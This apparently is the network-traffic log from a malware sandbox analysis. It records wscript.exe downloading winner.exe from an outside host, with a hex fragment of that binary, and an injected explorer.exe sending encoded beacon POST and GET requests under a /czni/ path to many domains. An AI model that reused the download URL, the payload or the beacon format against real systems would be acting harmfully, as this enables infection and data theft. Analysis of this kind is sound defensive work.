                                                                          Host: www.octohoki.net
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.octohoki.net
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.octohoki.net/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=1gqeWzVyqVP4S0wfhHhgKBr5erb_8e(qrmo2J2RT6-I34kv4kiGjxpDejoxDXcIGaHXfqfJaxVGTiqt6mjHnMKP-yO88Q9flGmLythU0R3lC7z2k3Z~1wcHAT7TlrFgcyLfFYPXdhSjnIywaFaGoWrT6btJMOSyggjFFpvw4Y289QBd2cw).
                                                                          Jan 30, 2023 13:42:15.295717955 CET  1030  IN  HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:42:15 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qli%2BxEDjmLkYhchRvDrr074cTc9eMZY83d73NAVWZzvTZwZhsWIlzncpTM4l3hJ1RrfIspzXd%2BqHuWC4038gwPm6w68qgBI8OHSEyQncXNeI7C8UmvAIBsEEaOmHCDGcTD%2B3"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 791a4953bf1106e5-LHR
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Jan 30, 2023 13:42:15.295805931 CET  1030  IN
                                                                          Jan 30, 2023 13:42:15.295852900 CET  1031  IN  Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                          29  192.168.2.5  49740  172.67.179.191  80  C:\Windows\explorer.exe
                                                                          Timestamp  kBytes transferred  Direction  Data
                                                                          Jan 30, 2023 13:42:17.527848005 CET  1032  OUT  GET /czni/?20=4xfPiv3RnE&z8rul-n=4iC+VHkN7UzSdUovnFh7HjvkVuvE2o78vWsfJQRZ88kc+lrgrCCJnpqL68g1VIZYfy6U/dRc4iar4OlCjHSLY4rOm4VqYu/FMA== HTTP/1.1
                                                                          Host: www.octohoki.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:42:17.854996920 CET  1033  IN  HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:42:17 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7%2BsKB3TdwtpE%2FkxJI0cv7MJgObb8a3UJf4PnZaGfmHBpE61FYhi6JD%2FJhhbo%2Fu%2FXC7tZwRPM8r6K8BmXzULATwGj3qTqGV2XHL2b46jrFl%2FnGDeV17bC8DEBCvP%2BYyK595T3"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 791a4963a82e71ed-LHR
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Ascii: 649<!DOCTYPE html><html lang="en"><head> <title>404 PAGE NOT FOUND</title> ... Meta --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta content="width=1200, initial-scale=1" name="viewport"> ... <meta content="viewport" content="width=1200"> --> <meta content="" name="description"> <meta content="" name="author"> ... Favicon --> <link rel="shortcut icon" href="favicon.ico"> ... CSS Global Compulsory --> <link rel="stylesheet" href="css/bootstrap.web.min.css"> <link href="css/responsiveweb.css" rel="stylesheet" type="text/css"></head><body><nav class="navb
                                                                          Jan 30, 2023 13:42:17.855050087 CET  1034  IN
                                                                          Data Ascii: ar"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar"> <span class="icon-bar"></span> <span class="icon-bar"></span>
                                                                          Jan 30, 2023 13:42:17.855070114 CET  1034  IN  Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                          3  192.168.2.5  49710  194.58.112.174  80  C:\Windows\explorer.exe
                                                                          Timestamp  kBytes transferred  Direction  Data
                                                                          Jan 30, 2023 13:40:03.305179119 CET  758  OUT  GET /czni/?z8rul-n=E4OQobxTIZHI9DwF67UlwwaqlZHGKxy7UPoiurSE2O3aUzyIC/5i48ZUEimfrB3iPtHclG/TUXxg+aW3JsqIZG+/wkw9ZppI6Q==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.toporsche.online
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:03.364614010 CET | 760 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:40:03 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Ascii: 2a88<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.toporsche.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts-content.js')" onerror="window.trackScriptLoad('/head-scripts-content.js', 1)" src="/head-scripts-content.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">
                                                                          Jan 30, 2023 13:40:03.364670038 CET | 761 | IN
                                                                          Data Ascii: &nbsp;<a class="b-link" href="https://reg.ru" rel="nofollow noopener noreferrer" target="_blank">REG.RU</a></div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hostin
                                                                          Jan 30, 2023 13:40:03.364720106 CET | 762 | IN
                                                                          Data Ascii: ze_large b-title_size_big@lg b-title_size_big@desktop b-parking__title"> c REG.RU</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__p
                                                                          Jan 30, 2023 13:40:03.364768982 CET | 764 | IN
                                                                          Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" h
                                                                          Jan 30, 2023 13:40:03.364819050 CET | 765 | IN
                                                                          Data Ascii: d/?utm_source=www.toporsche.online&utm_medium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large
                                                                          Jan 30, 2023 13:40:03.364871979 CET | 766 | IN
                                                                          Data Ascii: </p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.toporsche.online&utm_medium=parking&utm_campaign=s_
                                                                          Jan 30, 2023 13:40:03.364919901 CET | 767 | IN
                                                                          Data Ascii: ass="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop"> SSL- &nbsp;
                                                                          Jan 30, 2023 13:40:03.364969969 CET | 769 | IN
                                                                          Data Ascii: } } } var script = document.createElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.toporsche.
                                                                          Jan 30, 2023 13:40:03.365015984 CET | 770 | IN
                                                                          Data Ascii: Layer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          30 | 192.168.2.5 | 49741 | 87.236.16.153 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:42:23.134269953 CET | 1035 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.hougou.ru
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.hougou.ru
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.hougou.ru/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=BsOLTqK-6qWQmHA35s5odTZLPzKAJnVSdc4DqLrWQpgCdDujtwbXY-xytFhee9duvIMEn7RoaoaLumV-X9zJukf0cI9n2w3kTOlayPYSENcwI4v3d5u0~Ic2HPqq5psRxQFS6msoaZf-bfx7Fc6iDwD1Rmt2l1E2gepztyE8Q2HtBaf2ZA).
                                                                          Jan 30, 2023 13:42:23.248631001 CET | 1036 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx-reuseport/1.21.1
                                                                          Date: Mon, 30 Jan 2023 12:42:23 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          31 | 192.168.2.5 | 49742 | 87.236.16.153 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:42:25.723154068 CET | 1036 | OUT | GET /czni/?z8rul-n=MumrQfrFlOyD9XsP8OR0UClXFyftPmtzTeYgycr6a5IUfga2ox/HNpA7pnpLcbk4ltNykJNVaPuH0Ad8Q8mslGHvUdw/9wroMg==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.hougou.ru
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:42:25.803071976 CET | 1037 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx-reuseport/1.21.1
                                                                          Date: Mon, 30 Jan 2023 12:42:25 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Content-Length: 273
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.hougou.ru Port 80</address></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          32 | 192.168.2.5 | 49743 | 14.128.47.126 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:42:32.091612101 CET | 1038 | OUT | GET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1
                                                                          Host: www.panalobet88.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:42:32.356997013 CET | 1038 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:42:32 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          4 | 192.168.2.5 | 49711 | 208.91.197.91 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:40:08.721944094 CET | 771 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.chimid.org
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.chimid.org
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.chimid.org/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=n6HutppQqyUuh7BYXE8RWIS8Ehh12SWkmHXBhiTrAheo9wxO9-r5OKY6emUJ9Vac93ZhSw1yhkLSmaNIqdNqUFxWoIDI9RyiVqg0wnDFL0Jj4rSbDj~FBgMFIyYHJvzND6c_KHUY1XVXVRClLHr3BnUkJXj_m6HkmZoeOzZ6DzugV6qvNw).


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          5 | 192.168.2.5 | 49712 | 208.91.197.91 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:40:11.394536018 CET | 772 | OUT | GET /czni/?20=4xfPiv3RnE&z8rul-n=q4vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM/Tg8TnJqujzMrtpKg/UGeVYytsfF/XPvWg== HTTP/1.1
                                                                          Host: www.chimid.org
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:12.377284050 CET | 773 | IN | HTTP/1.1 200 OK
                                                                          Date: Mon, 30 Jan 2023 12:40:11 GMT
                                                                          Server: Apache
                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                          Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                          Set-Cookie: vsid=919vr4226280122227923; expires=Sat, 29-Jan-2028 12:40:12 GMT; Max-Age=157680000; path=/; domain=www.chimid.org; HttpOnly
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_i6MpecTl/6NqwkSBJ1gTopxy2SMKJIc1l336ZsESpXVwPvBHIBAsm8KXkR940yMsmRxdgsF9z+4a1vNw9SYUTg==
                                                                          Content-Length: 2819
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Connection: close
                                                                          Jan 30, 2023 13:40:12.377315044 CET | 773 | IN
                                                                          Data Ascii: ...top.location="http://www.chimid.org/?fp=iwQIu1tjR7CnZGgjiPMyB4%2BSPFXjElcooAf1uRDWDv3sSzMeNsXP9Lq%2FtkXLuJOv4fk73cezi%2Fr25cQ2HKdFOrx6Gm7ElDmwEik5AKXzzZTxKC%2Bin7vwGR2%2Fa%2FD%2Fi8z9ocLxrGutgR6
                                                                          Jan 30, 2023 13:40:12.377343893 CET | 774 | IN
                                                                          Data Ascii: APNfAEYIaufHicD9GQcOCqeEocdIABo8%3D&prvtof=8SXjFR1iah4T9OBqtBCHp0JQvLDvxZixLMj9%2FMbr34M%3D&poru=5YTvFPfqDDyPqPTeAI913D58ZvlPmJt5ZbygKdUK4t7U6haB9nYVdrhXX8vnTco3nvqVMCCEX3EgWKrEWoef2CM5tU1E%2Bcpvs%2BKj9EvZSEkIGl5J9A2IEdBGRemPwTdY1H3TddFyxtA6q3
                                                                          Jan 30, 2023 13:40:12.377372980 CET | 775 | IN
                                                                          Data Ascii: zMeNsXP9Lq%2FtkXLuJOv4fk73cezi%2Fr25cQ2HKdFOrx6Gm7ElDmwEik5AKXzzZTxKC%2Bin7vwGR2%2Fa%2FD%2Fi8z9ocLxrGutgR6APNfAEYIaufHicD9GQcOCqeEocdIABo8%3D&prvtof=k3ZTLwGdKjjzkWb7cmbPuGpODNj6WCjrs6ESb1AJb2o%3D&poru=Gg74Y6M9YCTQAQgLXsr6Y3mMNXFL2sM1eQO6io%2BA
                                                                          Jan 30, 2023 13:40:12.377397060 CET | 776 | IN
                                                                          Data Ascii: vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM%2FTg8TnJqujzMrtpKg%2FUGeVYytsfF%2FXPvWg%3D%3D">Click here to proceed</a>.</body></noframes></html>...*/-->
                                                                          Jan 30, 2023 13:40:12.425951004 CET | 776 | IN
                                                                          Data Ascii: vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM%2FTg8TnJqujzMrtpKg%2FUGeVYytsfF%2FXPvWg%3D%3D">Click here to proceed</a>.</body></noframes></html>...*/-->


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          6 | 192.168.2.5 | 49714 | 66.96.162.149 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:40:19.048485994 CET | 784 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.genuineinsights.cloud
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.genuineinsights.cloud
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.genuineinsights.cloud/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=54IoX3FweMmcefG5tgIIgS27F0ee6-yZUJC7NgIZOWE78ZyyPQdd38ePPsij8PQeta1lwg~Wg2x4TmcKYl4rPoas4YYef3RQ97NNumRSdy2c9agqTIE_Tkfhwv47CeB4MI7RPxvrZYwhnbV_QkPT5N8DW8GFmvjwsfcqp-PHaFZ7czHXHQ).
                                                                          Jan 30, 2023 13:40:19.462457895 CET | 786 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 867
                                                                          Connection: close
                                                                          Server: Apache/2
                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                          Accept-Ranges: bytes
                                                                          Age: 0
                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> <!-- browser does not support iframe's --> </iframe> </body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          7 | 192.168.2.5 | 49715 | 66.96.162.149 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:40:21.675069094 CET | 786 | OUT | GET /czni/?z8rul-n=06gIUCFIBOa1TNKOgihx1QaHEyCsoo2zVarqfXE1BGhN6bynIxp2kNvfG92v3asKvvgl0gKrl2tBRyImUhoMMpO0yMdYVRtJxA==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.genuineinsights.cloud
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:23.543339968 CET | 788 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:23 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 867
                                                                          Connection: close
                                                                          Server: Apache/2
                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                          Accept-Ranges: bytes
                                                                          Age: 0
                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> <!-- browser does not support iframe's --> </iframe> </body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          8 | 192.168.2.5 | 49716 | 137.59.148.248 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:40:29.928004980 CET | 789 | OUT | POST /czni/ HTTP/1.1
                                                                          Host: www.44yyds.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.44yyds.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.44yyds.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Ascii: z8rul-n=OBfrIR1O0RpwxzHBzQtlJIozhmm521rFtYtRNbgwj8mCYN0BN78mjw4qefLzqm9odBYWhPi0hIEkJMzt5KtBMWymKdEl9D0fbF7KgpCq53rXzaXMEIjR~YtbrBEhshiVLh8BERkhE7uwuy4G8AClJr67FHsyZg6z3CqPhzfeMXoPXDHlIA).
                                                                          Jan 30, 2023 13:40:30.151243925 CET | 790 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:30 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Last-Modified: Fri, 18 Feb 2022 06:24:03 GMT
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Encoding: gzip
                                                                          Content-Length: 358
                                                                          Content-Type: text/html


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          9 | 192.168.2.5 | 49717 | 137.59.148.248 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Jan 30, 2023 13:40:34.488315105 CET | 790 | OUT | GET /czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew== HTTP/1.1
                                                                          Host: www.44yyds.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:34.709826946 CET | 791 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:34 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Last-Modified: Fri, 18 Feb 2022 06:24:03 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 583
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/html
                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          0 | 192.168.2.5 | 49703 | 91.227.138.48 | 443 | C:\Windows\System32\wscript.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          2023-01-30 12:39:17 UTC | 0 | OUT | GET /ti/winner.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-us
                                                                          UA-CPU: AMD64
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                          Host: hirosguide.hu
                                                                          Connection: Keep-Alive
                                                                          2023-01-30 12:39:17 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                          Date: Mon, 30 Jan 2023 12:39:17 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Mon, 30 Jan 2023 01:30:14 GMT
                                                                          ETag: "1f83c43-97200-5f37128270b27"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 619008
                                                                          Connection: close
                                                                          Content-Type: application/x-msdownload
                                                                          Data Ascii: O0%]g!+U-72zk>Mt73r^uy?LVr@6D6c!34i'~OlTmF%{[MQ+9eNwwzD4"74z0fs*1/ACR1wB:ekX#q`M\\j,GOlM5V\H7QRzB3s?+=
                                                                          2023-01-30 12:39:17 UTC94INData Raw: af ae a7 43 54 65 56 66 d1 ce e9 0e b9 14 4f 3c 75 11 71 f9 48 f7 cb e8 03 cb 68 d3 33 8c 69 96 13 0e 49 dd 14 bf 7d e2 d7 70 97 a6 ff b3 e6 62 9a 43 4b c5 78 85 4e 18 f3 67 c8 af 15 79 23 c2 c1 7a 67 92 70 5e 3a 55 28 77 fa 0d e1 7c 4e 42 95 d8 f6 3f 4c fd 1f 5b 80 3f c8 e0 fd 17 56 25 cf 41 a7 a9 92 5e 87 f3 e0 65 24 4e 67 30 ac 87 69 22 f8 2c 72 84 c8 20 34 a6 b9 44 4f 0f 59 18 cd 18 2b a5 61 95 da be f1 83 ab 43 7a b5 08 bd d3 38 81 51 b2 65 9c cf ad 10 e3 ba 33 f9 31 31 40 21 0a bf a1 6f 3e f9 90 03 96 e9 82 fe 6a f5 e9 54 cb 4e 86 45 1b 5e 4b f7 16 cc b0 ad 1c 11 a7 80 76 21 1c ed 0d de a9 ff 64 bd be 70 0f 61 05 1e 56 d0 ad ab 00 17 cc df 0d 90 93 e9 f4 7b 67 89 00 a2 9c 2e 28 a8 17 cf 59 5e 0b 9a 8a 0f b6 93 77 52 23 38 3c e1 7e e5 4d 7f 9c b8 67
                                                                          Data Ascii: CTeVfO<uqHh3iI}pbCKxNgy#zgp^:U(w|NB?L[?V%A^e$Ng0i",r 4DOY+aCz8Qe311@!o>jTNE^Kv!dpaV{g.(Y^wR#8<~Mg
